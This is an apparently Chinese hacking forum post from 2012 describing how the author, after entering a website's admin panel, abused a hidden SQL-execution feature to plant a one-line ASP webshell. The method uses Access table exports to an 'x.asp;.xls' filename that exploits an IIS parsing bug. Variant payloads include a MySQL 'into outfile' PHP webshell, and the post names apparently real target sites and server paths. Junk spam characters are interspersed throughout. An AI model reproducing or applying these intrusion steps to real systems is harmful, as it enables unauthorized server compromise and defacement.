好不容易进了后台,发现啥上传啊。备份啊多木有。5 r& c/ H% }* n2 e
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的0 ]9 k" d6 x0 L* m3 B# \' `
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
% h9 V8 O) L k7 Z/ Z( t然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
$ j' K# f9 L, Q8 k1.create table cmd (a varchar(50))& B/ g1 Q- X/ I* M7 g5 G
2.insert into cmd (a) values (‘‘)
! M1 P+ e2 u: S$ W4 L3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
7 z2 Y5 g5 _: ~, g f) S- l(把表cmd的内容导出为物理路径的一个EXCEL文件)
$ \. a8 Y" F$ t9 S4.drop table cmd5 c5 B5 B8 E/ p E
利用IIS的BUG成功拿到了WEBSHELL。1 W- \8 d( M6 s0 q, D2 }
7 x4 ]. v1 I q% [! M' w |3 Y
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话1 V3 b" {$ y" \( w( p b
8 O$ P8 t o% i3 Q. `0 ] SQL语句意思解释:) \, U, P8 f X4 v! @% }$ y% d
第一句
4 h( e' P; W* z( \/ N 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
+ L) e/ Y/ M% G3 O9 s2 f% H, A+ q7 a2 s
第二句2 u6 U8 d) b# s
在表cmd的a字段插入一句话木马6 N2 p$ w9 M; }1 j* ?3 |5 X
第三句" b7 d& B9 ]# B3 d+ x
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
, c% v! c9 k. ] F$ O' d2 D3 h' l4 s3 }
第四句! O% o4 @3 |; p' K# }* B. i0 e1 x
删除建立的cmd表4 E: q0 R, ~. ]! \- A$ ? t; {+ u
3 {# K8 H! P4 G4 f# F) x: }
以下内容为测试:
$ Y$ |( d, S* q Access利用后台SQL执行命令功能导出WebShell:
) ~% d: a6 q/ @3 X/ c9 U$ S" N 这个更简单:
) _+ ~' {; \9 v6 w/ N4 l+ J) y+ k9 }& e [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]4 S% [/ F7 @( e7 m9 Z" o/ B
或者2 s. ` o7 I2 `" A
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]$ T! s3 m! Y) Z: t
% L# i* L* s/ a
后台有执行SQL语句功能(vote为已知表段)
7 {5 B$ k N" G S1 u- Q 希望对大家有所帮助拿shell的又一个思路
( b- [) u% D2 m7 B |
发表于 2012-9-13 17:53:58
收藏
支持
反对